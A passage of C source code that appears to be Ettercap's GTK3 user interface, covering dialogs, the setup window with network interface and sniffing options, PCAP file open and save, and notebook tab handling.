gtkui_utf8_validate((char *)msg)) == NULL) return; gtkui_infobar_show(GTK_MESSAGE_ERROR, msg); return; } /* * handle a fatal error and exit */ static void gtkui_fatal_error(const char *msg) { /* if the gui is working at this point display the message in a dialog */ if(window) gtkui_error(msg); /* also dump it to console in case ettercap was started in an xterm */ fprintf(stderr, "FATAL ERROR: %s\n\n\n", msg); clean_exit(-1); } /* * get an input from the user */ void gtkui_input(const char *title, char *input, size_t n, void (*callback)(void)) { GtkWidget *dialog, *entry, *label, *hbox, *vbox, *image, *content_area; dialog = gtk_dialog_new_with_buttons(PROGRAM" Input", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 6); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); image = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 0); label = gtk_label_new (title); gtk_label_set_line_wrap (GTK_LABEL (label), TRUE); gtk_label_set_selectable (GTK_LABEL (label), TRUE); gtk_box_pack_start (GTK_BOX (hbox), label, TRUE, TRUE, 0); entry = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(entry), n); g_object_set_data(G_OBJECT (entry), "dialog", dialog); g_signal_connect(G_OBJECT (entry), "activate", G_CALLBACK (gtkui_dialog_enter), NULL); if (input) gtk_entry_set_text(GTK_ENTRY (entry), input); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_box_pack_start(GTK_BOX(vbox), entry, TRUE, FALSE, 0); gtk_box_pack_start(GTK_BOX (hbox), vbox, FALSE, FALSE, 5); gtk_widget_show_all (hbox); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { strncpy(input, gtk_entry_get_text(GTK_ENTRY (entry)), n); if (callback != NULL) { gtk_widget_destroy(dialog); callback(); return; } } gtk_widget_destroy(dialog); } /* * show or update the progress bar */ static void gtkui_progress(char *title, int value, int max) { static GtkWidget *hbox, *header, *content; /* the first time, create the object */ if (progress_bar == NULL) { header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), "Progress"); gtk_header_bar_set_decoration_layout(GTK_HEADER_BAR(header), ":close"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); progress_dialog = gtk_dialog_new(); gtk_window_set_title(GTK_WINDOW (progress_dialog), PROGRAM); gtk_window_set_titlebar(GTK_WINDOW(progress_dialog), header); gtk_window_set_modal(GTK_WINDOW (progress_dialog), TRUE); gtk_window_set_transient_for(GTK_WINDOW(progress_dialog), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(progress_dialog), GTK_WIN_POS_CENTER_ON_PARENT); gtk_container_set_border_width(GTK_CONTAINER (progress_dialog), 10); g_signal_connect(G_OBJECT(progress_dialog), "delete_event", G_CALLBACK(gtkui_progress_cancel), NULL); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 3); content = gtk_dialog_get_content_area(GTK_DIALOG(progress_dialog)); gtk_container_add(GTK_CONTAINER(content), hbox); progress_bar = gtk_progress_bar_new(); gtk_progress_bar_set_show_text(GTK_PROGRESS_BAR(progress_bar), TRUE); gtk_box_pack_start(GTK_BOX(hbox), progress_bar, TRUE, TRUE, 20); } /* the subsequent calls have to only update the object */ gtk_progress_bar_set_text(GTK_PROGRESS_BAR(progress_bar), title); gtk_progress_bar_set_fraction(GTK_PROGRESS_BAR(progress_bar), (gdouble)((gdouble)value / (gdouble)max)); /* update dialog window */ gtk_widget_show_all(progress_dialog); /* * when 100%, destroy it */ if (value == max) { if (progress_dialog) gtk_widget_destroy(progress_dialog); progress_dialog = NULL; progress_bar = NULL; } } static gboolean gtkui_progress_cancel(GtkWidget *window, gpointer data) { /* variable not used */ (void) window; progress_canceled = TRUE; /* the progress dialog must be manually destroyed if the cancel button is used */ if (data != NULL && GTK_IS_WIDGET(data)) { gtk_widget_destroy(data); progress_dialog = NULL; progress_bar = NULL; } return(FALSE); } /* * print a message */ void gtkui_message(const char *msg) { DEBUG_MSG("gtkui_message: %s", msg); gtkui_infobar_show(GTK_MESSAGE_INFO, msg); } /* * Create the main interface and enter the second loop */ void gtkui_start(void) { guint idle_flush; gint online; DEBUG_MSG("gtkui_start"); idle_flush = g_timeout_add(500, gtkui_flush_msg, NULL); /* which interface do we have to display ? */ online = (EC_GBL_OPTIONS->read ? 0 : 1); /* create second instance of the UI application */ etterapp = gtkui_setup(gtkui_create_menu, GINT_TO_POINTER(online)); /* start plugins defined on CLI */ g_idle_add(gtkui_plugins_autostart, NULL); /* the main gui loop, once this exits the gui will be destroyed */ g_application_run(G_APPLICATION(etterapp), 0, NULL); g_object_unref(G_OBJECT(etterapp)); g_source_remove(idle_flush); } static void toggle_unoffensive(GSimpleAction *action, GVariant *value, gpointer data) { (void) data; g_simple_action_set_state(action, value); EC_GBL_OPTIONS->unoffensive ^= 1; } static void toggle_nopromisc(GSimpleAction *action, GVariant *value, gpointer data) { (void) data; g_simple_action_set_state(action, value); EC_GBL_PCAP->promisc ^= 1; } /* * display the initial menu to setup global options * at startup. */ GtkApplication* gtkui_setup(void * activate_func, gpointer data) { GtkApplication *app; DEBUG_MSG("gtkui_setup"); app = gtk_application_new("org.gtk.Ettercap", 0); g_signal_connect(app, "activate", G_CALLBACK(activate_func), data); return app; } /* * activate callback for GtkApplication for building the widgets * for the setup dialog */ static void gtkui_build_widgets(GApplication* app, gpointer data) { GtkWidget *header, *menubutton, *logo, *switcher; GtkWidget *layout, *label, *combo1, *combo2, *setting_frame, *grid, *box; GtkBuilder *builder; GtkListStore *iface_list; GtkTreeIter iter; GtkCellRenderer *cell1, *cell2; gint width, height, left, top; gchar *title = NULL; char *path = NULL, *markup = NULL; guint i; pcap_if_t *dev; (void) data; /* accelerators */ static gtkui_accel_map_t accels[] = { {"app.pcap_filter", {"p", NULL}}, {"app.set_netmask", {"n", NULL}}, {"app.open", {"o", NULL}}, {"app.save", {"s", NULL}}, #ifndef OS_WINDOWS {"app.help", {"F1", NULL}}, #endif {"app.quit", {"q", "x", NULL}} }; /* actions */ static GActionEntry action_entries[] = { {"set_promisc", NULL, NULL, ENABLED, toggle_nopromisc, {}}, {"set_unoffensive", NULL, NULL, DISABLED, toggle_unoffensive, {}}, {"open", gtkui_file_open, NULL, NULL, NULL, {}}, {"save", gtkui_file_write, NULL, NULL, NULL, {}}, {"about", gtkui_about, NULL, NULL, NULL, {}}, {"shortcuts", gtkui_show_shortcuts, "s", NULL, NULL, {}}, #ifndef OS_WINDOWS {"help", gtkui_help, NULL, NULL, NULL, {}}, #endif {"quit", gtkui_exit, NULL, NULL, NULL, {}}, {"pcap_filter", gtkui_pcap_filter, NULL, NULL, NULL, {}}, {"set_netmask", gtkui_set_netmask, NULL, NULL, NULL, {}} }; DEBUG_MSG("gtkui_build_widgets (activate method)"); /* honor CLI options */ if(!EC_GBL_PCAP->promisc) /* setting the menu item active will toggle this setting */ /* it will be TRUE after the menu is updated */ action_entries[0].state = DISABLED; if(EC_GBL_OPTIONS->unoffensive) action_entries[1].state = ENABLED; /* add actions to the application */ g_action_map_add_action_entries(G_ACTION_MAP(app), action_entries, G_N_ELEMENTS(action_entries), app); /* map accelerators to actions */ for (i = 0; i < G_N_ELEMENTS(accels); i++) { gtk_application_set_accels_for_action(GTK_APPLICATION(app), accels[i].action, accels[i].accel); } /* menu structures */ builder = gtk_builder_new(); gtk_builder_add_from_string(builder, "" " " "
" " " " _Open PCAP" " app.open" " document-open" " " " " " _Save PCAP" " app.save" " document-save" " " "
" "
" #ifndef OS_WINDOWS " " " Help" " app.help" " help-browser" " " #endif " " " Shortcuts" " app.shortcuts" " setup-shortcuts" " " " " " _About Ettercap" " app.about" " help-about" " " "
" "
" " " " _Quit" " app.quit" " application-exit" " " "
" " " " " "
" " Options" " " " Unoffensive" " app.set_unoffensive" " " " " " Promisc mode" " app.set_promisc" " " " " " Set Netmask" " app.set_netmask" " " "
" " " "", -1, NULL); /* set app menu */ gtk_application_set_app_menu(GTK_APPLICATION(app), G_MENU_MODEL(gtk_builder_get_object(builder, "app-menu"))); if (g_getenv("APP_MENU_FALLBACK")) g_object_set(gtk_settings_get_default(), "gtk-shell-shows-app-menu", FALSE, NULL); /* position main window */ width = gtkui_conf_get("window_width"); height = gtkui_conf_get("window_height"); left = gtkui_conf_get("window_left"); top = gtkui_conf_get("window_top"); /* setup window needs minimal size */ width = width < 800 ? 800 : width; height = height < 400 ? 400 : height; /* Adjust title formatting */ title = g_strdup(PROGRAM); *title = g_ascii_toupper(*title); /* create main window */ window = gtk_application_window_new(GTK_APPLICATION(app)); gtk_application_window_set_show_menubar(GTK_APPLICATION_WINDOW(window), TRUE); gtk_window_set_title(GTK_WINDOW(window), title); gtk_window_set_default_size(GTK_WINDOW(window), width, height); /* set window icon */ path = ICON_DIR "/" ICON_FILE; if (g_file_test(path, G_FILE_TEST_EXISTS)) { gtk_window_set_icon(GTK_WINDOW(window), gdk_pixbuf_new_from_file(path, NULL)); } else { /* if neither path is valid gtk will use a broken image icon */ gtk_window_set_icon(GTK_WINDOW(window), gdk_pixbuf_new_from_file("./share/" ICON_FILE, NULL)); } if(left > 0 || top > 0) gtk_window_move(GTK_WINDOW(window), left, top); g_signal_connect(G_OBJECT (window), "delete_event", G_CALLBACK(gtkui_exit), NULL); /* create header bar and menu buttons */ header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), title); gtk_header_bar_set_subtitle(GTK_HEADER_BAR(header), EC_VERSION); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); gtk_window_set_titlebar(GTK_WINDOW(window), header); menubutton = gtk_menu_button_new(); gtk_widget_set_tooltip_text(menubutton, "Options"); gtk_menu_button_set_menu_model(GTK_MENU_BUTTON(menubutton), G_MENU_MODEL(gtk_builder_get_object(builder, "options-menu"))); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("open-menu-symbolic", GTK_ICON_SIZE_MENU)); gtk_header_bar_pack_end(GTK_HEADER_BAR(header), menubutton); /* main content area */ box = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER(window), box); /* prepare infobar for later notifications */ infoframe = gtkui_infobar_new(NULL); gtk_box_pack_start(GTK_BOX(box), infoframe, FALSE, FALSE, 0); /* the ettercap logo */ path = INSTALL_DATADIR "/" PROGRAM "/" LOGO_FILE; if(g_file_test(path, G_FILE_TEST_EXISTS)) logo = gtk_image_new_from_file(path); else /* if neither path is valid gtk will use a broken image icon */ logo = gtk_image_new_from_file("./share/" LOGO_FILE); /* create overlay to display the logo and overlay the settings widgets */ layout = gtk_layout_new(NULL, NULL); gtk_box_pack_start(GTK_BOX(box), layout, TRUE, TRUE, 0); gtk_layout_put(GTK_LAYOUT(layout), logo, 0, 0); setting_frame = gtk_frame_new(NULL); gtk_frame_set_label(GTK_FRAME(setting_frame), "Setup"); gtk_frame_set_label_align(GTK_FRAME(setting_frame), 0.5, 0.0); gtk_frame_set_shadow_type(GTK_FRAME(setting_frame), GTK_SHADOW_ETCHED_OUT); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 10); gtk_grid_set_column_spacing(GTK_GRID(grid), 10); g_object_set(grid, "margin", 10, NULL); gtk_container_add(GTK_CONTAINER(setting_frame), grid); label = gtk_label_new(NULL); markup = g_markup_printf_escaped( "%s", "Primary Interface"); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, 0, 1, 1, 1); g_free(markup); /* make a list of network interfaces */ iface_list = gtk_list_store_new(2, G_TYPE_STRING, G_TYPE_STRING); for (dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) { gtk_list_store_append(iface_list, &iter); gtk_list_store_set(iface_list, &iter, 0, dev->name, 1, dev->description, -1); } /* make a drop down box for the primary interface and attach the list */ combo1 = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(combo1), GTK_TREE_MODEL(iface_list)); cell1 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(combo1), cell1, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(combo1), cell1, "text", 1, NULL); g_signal_connect(G_OBJECT(combo1), "changed", G_CALLBACK(gtkui_set_iface_unified), NULL); gtk_combo_box_set_active(GTK_COMBO_BOX(combo1), 0); gtk_grid_attach(GTK_GRID(grid), combo1, 1, 1, 1, 1); label = gtk_label_new(NULL); markup = g_markup_printf_escaped( "%s", "Sniffing at startup"); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, 0, 0, 1, 1); g_free(markup); switcher = gtk_switch_new(); box = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_box_set_homogeneous(GTK_BOX(box), FALSE); gtk_box_pack_start(GTK_BOX(box), switcher, FALSE, FALSE, 0); gtk_grid_attach(GTK_GRID(grid), box, 1, 0, 1, 1); if (EC_GBL_CONF->sniffing_at_startup) gtk_switch_set_active(GTK_SWITCH(switcher), TRUE); g_signal_connect(G_OBJECT(switcher), "state-set", G_CALLBACK(gtkui_autostart_switch), NULL); label = gtk_label_new(NULL); markup = g_markup_printf_escaped( "%s", "Bridged sniffing"); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, 0, 2, 1, 1); g_free(markup); switcher = gtk_switch_new(); box = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_box_set_homogeneous(GTK_BOX(box), FALSE); gtk_box_pack_start(GTK_BOX(box), switcher, FALSE, FALSE, 0); gtk_grid_attach(GTK_GRID(grid), box, 1, 2, 1, 1); label = gtk_label_new(NULL); markup = g_markup_printf_escaped( "%s", "Bridged Interface"); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, 0, 3, 1, 1); /* make a drop down box for the bridge interface and assign the list to it */ combo2 = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(combo2), GTK_TREE_MODEL(iface_list)); cell2 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(combo2), cell2, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(combo2), cell2, "text", 1, NULL); g_signal_connect(G_OBJECT(combo2), "changed", G_CALLBACK(gtkui_set_iface_bridge), NULL); gtk_combo_box_set_active(GTK_COMBO_BOX(combo2), 1); gtk_grid_attach(GTK_GRID(grid), combo2, 1, 3 , 1, 1); gtk_widget_set_sensitive(combo2, FALSE); /* enable / disable bridged interface combo box */ g_signal_connect(G_OBJECT(switcher), "state-set", G_CALLBACK(gtkui_bridged_switch), combo2); gtk_layout_put(GTK_LAYOUT(layout), setting_frame, 450, 10); menubutton = gtk_button_new(); gtk_widget_set_tooltip_text(menubutton, "Accept"); gtk_button_set_image(GTK_BUTTON(menubutton), gtk_image_new_from_icon_name("emblem-ok-symbolic", GTK_ICON_SIZE_BUTTON)); gtk_header_bar_pack_end(GTK_HEADER_BAR(header), menubutton); g_signal_connect(G_OBJECT(menubutton), "clicked", G_CALLBACK(gtkui_sniff), switcher); gtk_widget_show_all(GTK_WIDGET(window)); g_object_unref(iface_list); g_object_unref(builder); g_free(title); DEBUG_MSG("gtk_setup: end"); } /* * display the file open dialog */ static void gtkui_file_open(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *chooser, *content; gchar *filename; int response = 0; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_file_open"); dialog = gtk_dialog_new_with_buttons("Select a PCAP file for offline sniffing ...", GTK_WINDOW (window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); chooser = gtk_file_chooser_widget_new(GTK_FILE_CHOOSER_ACTION_OPEN); gtk_container_add(GTK_CONTAINER(content), chooser); gtk_widget_show(chooser); /* This way the file chooser dialog doesn't start in the recent section */ gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(chooser), ""); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(chooser)); /* destroy needs to come before read_pcapfile so gtk_main_quit can reside inside read_pcapfile, which is why destroy is here twice and not after the if() block */ gtk_widget_destroy (dialog); read_pcapfile (filename); g_free(filename); } else { gtk_widget_destroy (dialog); } } static void read_pcapfile(gchar *file) { char pcap_errbuf[PCAP_ERRBUF_SIZE]; DEBUG_MSG("read_pcapfile %s", file); SAFE_CALLOC(EC_GBL_OPTIONS->pcapfile_in, strlen(file)+1, sizeof(char)); snprintf(EC_GBL_OPTIONS->pcapfile_in, strlen(file)+1, "%s", file); /* check if the file is good */ if (is_pcap_file(EC_GBL_OPTIONS->pcapfile_in, pcap_errbuf) != E_SUCCESS) { ui_error("%s", pcap_errbuf); SAFE_FREE(EC_GBL_OPTIONS->pcapfile_in); return; } /* set the options for reading from file */ EC_GBL_OPTIONS->silent = 1; EC_GBL_OPTIONS->unoffensive = 1; EC_GBL_OPTIONS->write = 0; EC_GBL_OPTIONS->read = 1; gtk_main_quit(); } /* * display the write file menu */ static void gtkui_file_write(GSimpleAction *action, GVariant *value, gpointer data) { #define FILE_LEN 40 GtkWidget *dialog, *content, *chooser; gchar *filename; int response = 0; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_file_write"); dialog = gtk_dialog_new_with_buttons("Save traffic in a PCAP file ...", GTK_WINDOW (window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); chooser = gtk_file_chooser_widget_new(GTK_FILE_CHOOSER_ACTION_SAVE); gtk_container_add(GTK_CONTAINER(content), chooser); gtk_widget_show(chooser); /* This way the file chooser dialog doesn't start in the recent section */ gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(chooser), ""); response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(chooser)); /* destroy needs to come before read_pcapfile so gtk_main_quit can reside inside read_pcapfile, which is why destroy is here twice and not after the if() block */ gtk_widget_destroy (dialog); EC_GBL_OPTIONS->pcapfile_out = filename; write_pcapfile(); } else { gtk_widget_destroy (dialog); } } static void write_pcapfile(void) { FILE *f; DEBUG_MSG("write_pcapfile"); /* check if the file is writeable */ f = fopen(EC_GBL_OPTIONS->pcapfile_out, "w"); if (f == NULL) { ui_error("Cannot write %s", EC_GBL_OPTIONS->pcapfile_out); g_free(EC_GBL_OPTIONS->pcapfile_out); return; } /* if ok, delete it */ fclose(f); unlink(EC_GBL_OPTIONS->pcapfile_out); /* set the options for writing to a file */ EC_GBL_OPTIONS->write = 1; EC_GBL_OPTIONS->read = 0; } /* * set unified interface when changed in UI */ static void gtkui_set_iface_unified(GtkComboBox *combo, gpointer data) { GtkTreeIter iter; gchar *iface; (void) data; gtk_combo_box_get_active_iter(combo, &iter); gtk_tree_model_get(gtk_combo_box_get_model(combo), &iter, 0, &iface, -1); DEBUG_MSG("gtkui_set_iface_unified: set iface '%s'", iface); SAFE_FREE(EC_GBL_OPTIONS->iface); SAFE_CALLOC(EC_GBL_OPTIONS->iface, IFACE_LEN, sizeof(char)); strncpy(EC_GBL_OPTIONS->iface, iface, IFACE_LEN); } /* * set bridged interface when changed */ static void gtkui_set_iface_bridge(GtkComboBox *combo, gpointer data) { GtkTreeIter iter; gchar *iface; (void) data; gtk_combo_box_get_active_iter(combo, &iter); gtk_tree_model_get(gtk_combo_box_get_model(combo), &iter, 0, &iface, -1); DEBUG_MSG("gtkui_set_iface_bridge: set iface '%s'", iface); SAFE_FREE(EC_GBL_OPTIONS->iface_bridge); SAFE_CALLOC(EC_GBL_OPTIONS->iface_bridge, IFACE_LEN, sizeof(char)); strncpy(EC_GBL_OPTIONS->iface_bridge, iface, IFACE_LEN); } /* * bridged sniffing switcher callback */ static gboolean gtkui_bridged_switch(GtkSwitch *switcher, gboolean state, gpointer data) { (void) data; //gtk_switch_set_active(switcher, state); gtk_switch_set_state(switcher, state); gtk_widget_set_sensitive(GTK_WIDGET(data), gtk_switch_get_active(switcher)); return TRUE; } /* * sniffing at startup switcher callback */ static gboolean gtkui_autostart_switch(GtkSwitch *switcher, gboolean state, gpointer data) { (void) data; //gtk_switch_set_active(switcher, state); gtk_switch_set_state(switcher, state); EC_GBL_CONF->sniffing_at_startup = gtk_switch_get_active(switcher); return TRUE; } /* * check if unified or bridged sniffing, * then quit this application intance to continue * main functions further initializing ettercap */ static void gtkui_sniff(GtkButton *button, gpointer data) { (void) button; /* set bridge sniffing if switcher has been set to "on" */ if (gtk_switch_get_active(GTK_SWITCH(data))) set_bridge_sniff(); /* quit first instance of GtkApplication */ g_application_quit(G_APPLICATION(etterapp)); } /* * display the pcap filter dialog */ static void gtkui_pcap_filter(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; #define PCAP_FILTER_LEN 50 DEBUG_MSG("gtk_pcap_filter"); if (EC_GBL_PCAP->filter == NULL) SAFE_CALLOC(EC_GBL_PCAP->filter, PCAP_FILTER_LEN, sizeof(char)); /* * no callback, the filter is set but we have to return to * the interface for other user input */ gtkui_input("Pcap filter :", EC_GBL_PCAP->filter, PCAP_FILTER_LEN, NULL); } /* * set a different netmask than the system one */ static void gtkui_set_netmask(GSimpleAction *action, GVariant *value, gpointer data) { struct ip_addr net; (void) action; (void) value; (void) data; DEBUG_MSG("gtkui_set_netmask"); if (EC_GBL_OPTIONS->netmask == NULL) SAFE_CALLOC(EC_GBL_OPTIONS->netmask, IP_ASCII_ADDR_LEN, sizeof(char)); /* * no callback, the filter is set but we have to return to * the interface for other user input */ gtkui_input("Netmask :", EC_GBL_OPTIONS->netmask, IP_ASCII_ADDR_LEN, NULL); /* sanity check */ if (strcmp(EC_GBL_OPTIONS->netmask, "") && ip_addr_pton(EC_GBL_OPTIONS->netmask, &net) != E_SUCCESS) ui_error("Invalid netmask %s", EC_GBL_OPTIONS->netmask); /* if no netmask was specified, free it */ if (!strcmp(EC_GBL_OPTIONS->netmask, "")) SAFE_FREE(EC_GBL_OPTIONS->netmask); } /* * Callback for g_timeout_add() to resolve a IP to name asyncronously * if the name is not already in the cache, host_iptoa * immediately returns but starts the resolution process * in the background. * This function periodically recalls this host_iptoa until * a result in available in the cache and updates the widget. */ gboolean gtkui_iptoa_deferred(gpointer data) { struct resolv_object *ro; char name[MAX_HOSTNAME_LEN]; ro = (struct resolv_object *)data; DEBUG_MSG("gtkui_iptoa_deferred"); if (host_iptoa(ro->ip, name) == E_SUCCESS) { /* * Name has now been resolved in the background * Set the widget text and destroy the timer */ if (ro->type == GTK_TYPE_LABEL) gtk_label_set_text(GTK_LABEL(ro->widget), name); else if (ro->type == GTK_TYPE_LIST_STORE) gtk_list_store_set(GTK_LIST_STORE(ro->liststore), &ro->treeiter, ro->column, name, -1); /* Free allocated memory */ SAFE_FREE(ro); /* destroy timer */ return FALSE; } else { /* Keep trying */ return TRUE; } } /* hitting "Enter" keyy in a combo box does the same as clicking OK button */ gboolean gtkui_combo_enter(GtkWidget *widget, GdkEventKey *event, gpointer data) { GtkWidget *dialog; /* variable not used */ (void) data; if (event->keyval == GDK_KEY_Return) { dialog = g_object_get_data(G_OBJECT(widget), "dialog"); gtk_dialog_response(GTK_DIALOG (dialog), GTK_RESPONSE_OK); return TRUE; } return FALSE; } /* hitting "Enter" key in dialog does same as clicking OK button */ void gtkui_dialog_enter(GtkWidget *widget, gpointer data) { GtkWidget *dialog; /* variable not used */ (void) data; dialog = g_object_get_data(G_OBJECT(widget), "dialog"); gtk_dialog_response(GTK_DIALOG (dialog), GTK_RESPONSE_OK); } /* create a new notebook (tab) page */ /* returns a parent widget to pack the contents of the page into */ GtkWidget *gtkui_page_new(char *title, void (*callback)(void), void (*detacher)(GtkWidget *)) { GtkWidget *parent, *label; GtkWidget *hbox, *button, *image; /* a container to hold the close button and tab label */ hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_widget_show(hbox); /* the label for the tab title */ label = gtk_label_new(title); gtk_box_pack_start(GTK_BOX(hbox), label, TRUE, TRUE, 0); gtk_widget_show(label); /* the close button */ button = gtk_button_new(); gtk_button_set_relief(GTK_BUTTON (button), GTK_RELIEF_NONE); gtk_box_pack_start(GTK_BOX(hbox), button, FALSE, FALSE, 0); gtk_widget_set_size_request(button, 20, 20); gtk_widget_show(button); /* an image for the button */ image = gtk_image_new_from_icon_name("window-close", GTK_ICON_SIZE_MENU); gtk_container_add(GTK_CONTAINER (button), image); gtk_widget_show(image); /* a parent to pack the contents into */ parent = gtk_frame_new(NULL); gtk_frame_set_shadow_type(GTK_FRAME(parent), GTK_SHADOW_NONE); gtk_widget_show(parent); if(!notebook && notebook_frame) { gtk_container_remove(GTK_CONTAINER (notebook_frame), gtk_bin_get_child(GTK_BIN (notebook_frame))); notebook = gtk_notebook_new(); gtk_notebook_set_tab_pos(GTK_NOTEBOOK (notebook), GTK_POS_TOP); gtk_notebook_set_scrollable(GTK_NOTEBOOK (notebook), TRUE); gtk_container_add(GTK_CONTAINER (notebook_frame), notebook); gtk_widget_show(notebook); gtkui_create_tab_menu(); } gtk_notebook_append_page(GTK_NOTEBOOK(notebook), parent, hbox); /* attach callback to destroy the tab/page */ g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK(gtkui_page_close), parent); /* attach callback to do specific clean-up */ if(callback) g_object_set_data(G_OBJECT (parent), "destroy", callback); if(detacher) g_object_set_data(G_OBJECT (parent), "detach", detacher); gtkui_page_present(parent); return(parent); } /* show and focus the page containing child */ void gtkui_page_present(GtkWidget *child) { int num = 0; num = gtk_notebook_page_num(GTK_NOTEBOOK (notebook), child); gtk_notebook_set_current_page(GTK_NOTEBOOK (notebook), num); } /* close the page containing the child passed in "data" */ void gtkui_page_close(GtkWidget *widget, gpointer data) { GtkWidget *child; gint num = 0; void (*callback)(void); /* variable not used */ (void) widget; (void) data; DEBUG_MSG("gtkui_page_close"); num = gtk_notebook_page_num(GTK_NOTEBOOK(notebook), GTK_WIDGET (data)); child = gtk_notebook_get_nth_page(GTK_NOTEBOOK(notebook), num); g_object_ref(G_OBJECT(child)); gtk_notebook_remove_page(GTK_NOTEBOOK(notebook), num); callback = g_object_get_data(G_OBJECT (child), "destroy"); if(callback) callback(); } /* close the currently focused notebook page */ void gtkui_page_close_current(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *child; gint num = 0; (void) action; (void) value; (void) data; num = gtk_notebook_get_current_page(GTK_NOTEBOOK (notebook)); child = gtk_notebook_get_nth_page(GTK_NOTEBOOK(notebook), num); gtkui_page_close(NULL, child); } /* show the context menu when the notebook tabs receive a mouse right-click */ gboolean gtkui_context_menu(GtkWidget *widget, GdkEventButton *event, gpointer data) { /* variable not used */ (void) widget; if(event->button == 3) { #if GTK_CHECK_VERSION(3,22,0) gtk_menu_popup_at_pointer(GTK_MENU(data), (GdkEvent*)event); #else gtk_menu_popup(GTK_MENU(data), NULL, NULL, NULL, NULL, 3, event->time); #endif /* * button press event handle must return TRUE to keep the selection * active when pressing the mouse button */ return TRUE; } return FALSE; } /* detach the currently focused notebook page into a free window */ void gtkui_page_detach_current(GSimpleAction *action, GVariant *value, gpointer data) { void (*detacher)(GtkWidget *); GtkWidget *child; gint num = 0; (void) action; (void) value; (void) data; num = gtk_notebook_get_current_page(GTK_NOTEBOOK (notebook)); if(num < 0) return; child = gtk_notebook_get_nth_page(GTK_NOTEBOOK(notebook), num); g_object_ref(G_OBJECT(child)); gtk_notebook_remove_page(GTK_NOTEBOOK(notebook), num); detacher = g_object_get_data(G_OBJECT (child), "detach"); if(detacher) detacher(child); } void gtkui_page_attach_shortcut(GtkWidget *win, void (*attacher)(void)) { GtkAccelGroup *accel; GClosure *closure = NULL; GdkModifierType mods; gint keyval; accel = gtk_accel_group_new (); gtk_window_add_accel_group(GTK_WINDOW (win), accel); closure = g_cclosure_new(G_CALLBACK(attacher), NULL, NULL); gtk_accelerator_parse ("D", &keyval, &mods); gtk_accel_group_connect(accel, keyval, mods, 0, closure); } /* change view and focus to the next notebook page */ void gtkui_page_right(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; gtk_notebook_next_page(GTK_NOTEBOOK (notebook)); } /* change view and focus to previous notebook page */ void gtkui_page_left(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; gtk_notebook_prev_page(GTK_NOTEBOOK (notebook)); } /* for connecting to browse buttons, pass entry widget as callback "data" 